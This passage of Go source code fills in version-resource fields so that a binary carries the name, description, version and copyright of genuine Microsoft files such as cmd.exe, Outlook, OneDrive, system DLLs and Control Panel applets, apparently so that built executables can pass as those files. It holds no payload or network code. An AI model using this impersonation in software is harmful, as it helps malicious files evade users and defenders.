vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Outlook"
}
if name == "lync" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Lync"
vi.StringFileInfo.FileDescription = "Skype for Business"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.exe"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Lync"
}
if name == "cmd" {
vi.StringFileInfo.InternalName = "cmd"
vi.StringFileInfo.FileDescription = "Windows Command Processor"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmd.exe"
vi.FixedFileInfo.ProductVersion.Patch = 1
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 1
vi.FixedFileInfo.FileVersion.Build = 18362
vi.StringFileInfo.InternalName = "cmd.exe"
}
if name == "OneDrive" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "OneDrive.exe"
vi.StringFileInfo.FileDescription = "Microsoft OneDrive"
vi.StringFileInfo.FileVersion = "20.114.0607.0002"
vi.StringFileInfo.LegalCopyright = "©¿½ Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "OneDrive.exe"
vi.FixedFileInfo.ProductVersion.Patch = 2
vi.FixedFileInfo.ProductVersion.Major = 20
vi.FixedFileInfo.ProductVersion.Minor = 114
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "20.114.0607.0002"
vi.FixedFileInfo.FileVersion.Major = 20
vi.FixedFileInfo.FileVersion.Minor = 114
vi.FixedFileInfo.FileVersion.Patch = 2
vi.FixedFileInfo.FileVersion.Build = 607
vi.StringFileInfo.InternalName = "OneDrive.exe"
}
if name == "apphelp" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Apphelp"
vi.StringFileInfo.FileDescription = "Application Compatibility Client Library"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "Apphelp.dll"
}
if name == "bcryptprimitives" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "bcryptprimitives.dll"
vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library"
vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.836"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 836
vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll"
}
if name == "cfgmgr32" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "cfgmgr32.dll"
vi.StringFileInfo.FileDescription = "Configuration Manager DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.387"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 387
vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll"
}
if name == "combase" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "COMBASE.DLL"
vi.StringFileInfo.FileDescription = "Microsoft COM for Windows"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "COMBASE.DLL"
}
if name == "cryptsp" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "cryptsp.dll"
vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "cryptsp.dll"
}
if name == "dnsapi" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "dnsapi"
vi.StringFileInfo.FileDescription = "DNS Client API DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "dnsapi"
}
if name == "dpapi" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "dpapi.dll"
vi.StringFileInfo.FileDescription = "Data Protection API"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "dpapi.dll"
}
if name == "sechost" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "sechost.dll"
vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "sechost.dll"
}
if name == "schannel" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "schannel.dll"
vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "schannel.dll"
}
if name == "urlmon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "UrlMon.dll"
vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32"
vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 11
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Internet Explorer"
vi.StringFileInfo.ProductVersion = "11.00.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "UrlMon.dll"
}
if name == "win32u" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Win32u"
vi.StringFileInfo.FileDescription = "Win32u"
vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.900"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "Win32u"
}
if name == "appwizard" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "appwiz.cpl"
vi.StringFileInfo.FileDescription = "Shell Application Manager"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "APPWIZ.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "appwiz.cpl"
}
if name == "bthprop" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "bthprops.cpl"
vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "bluetooth.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "bthprops.cpl"
}
if name == "desktop" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "desk.cpl"
vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "DESK.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "DESK"
}
if name == "netfirewall" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Firewall.cpl"
vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Firewall.cpl"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "Firewall.cpl"
}
if name == "FlashPlayer" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0"
vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet"
vi.StringFileInfo.FileVersion = "32.0.0.255"
vi.StringFileInfo.LegalCopyright = " Copyright © 1996-2019 Adobe. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries."
vi.StringFileInfo.OriginalFilename = "FlashPlayerCPLApp.cpl"
vi.FixedFileInfo.ProductVersion.Patch = 0
vi.FixedFileInfo.ProductVersion.Major = 32
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "32.0.0.255"
vi.FixedFileInfo.FileVersion.Major = 32
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 0
vi.FixedFileInfo.FileVersion.Build = 255
vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl"
}
if name == "hardwarewiz" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "hdwwiz.cpl"
vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "hdwwiz.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "hdwwiz"
}
if name == "inet" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "inetcpl.cpl"
vi.StringFileInfo.FileDescription = "Internet Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "inetcpl.cpl"
}
if name == "control" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "intl.cpl"
vi.StringFileInfo.FileDescription = "Control Panel DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "CONTROL"
}
if name == "irprop" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "irprops.cpl"
vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "irprops.cpl"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "Infrared Properties"
}
if name == "Game" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "joy.cpl"
vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "JOY.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "JOY.CPL"
}
if name == "inputs" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "main.cpl"
vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "main.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "main.cpl"
}
if name == "mimosys" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "mmsys.dll"
vi.StringFileInfo.FileDescription = "Audio Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "MMSys.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "mmsys.cpl"
}
if name == "ncp" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "ncpa.cpl"
vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "ncpa.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "ncpa.cpl"
}
if name == "power" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "powercfg.cpl"
vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "POWERCFG.CPL.MUI"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "powercfg.cpl"
}
if name == "speech" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "sapi.cpl"
vi.StringFileInfo.FileDescription = "Speech UX Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "sapi.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "sapi.cpl"
}
if name == "system" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "sysdm.cpl"
vi.StringFileInfo.FileDescription = "System Applet for the Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "sysdm.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "sysdm.cpl"
}
if name == "Tablet" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "TabletPC.cpl"
vi.StringFileInfo.FileDescription = "Tablet PC Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "tabletpc.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "TabletPC.cpl"
}
if name == "telephone" {
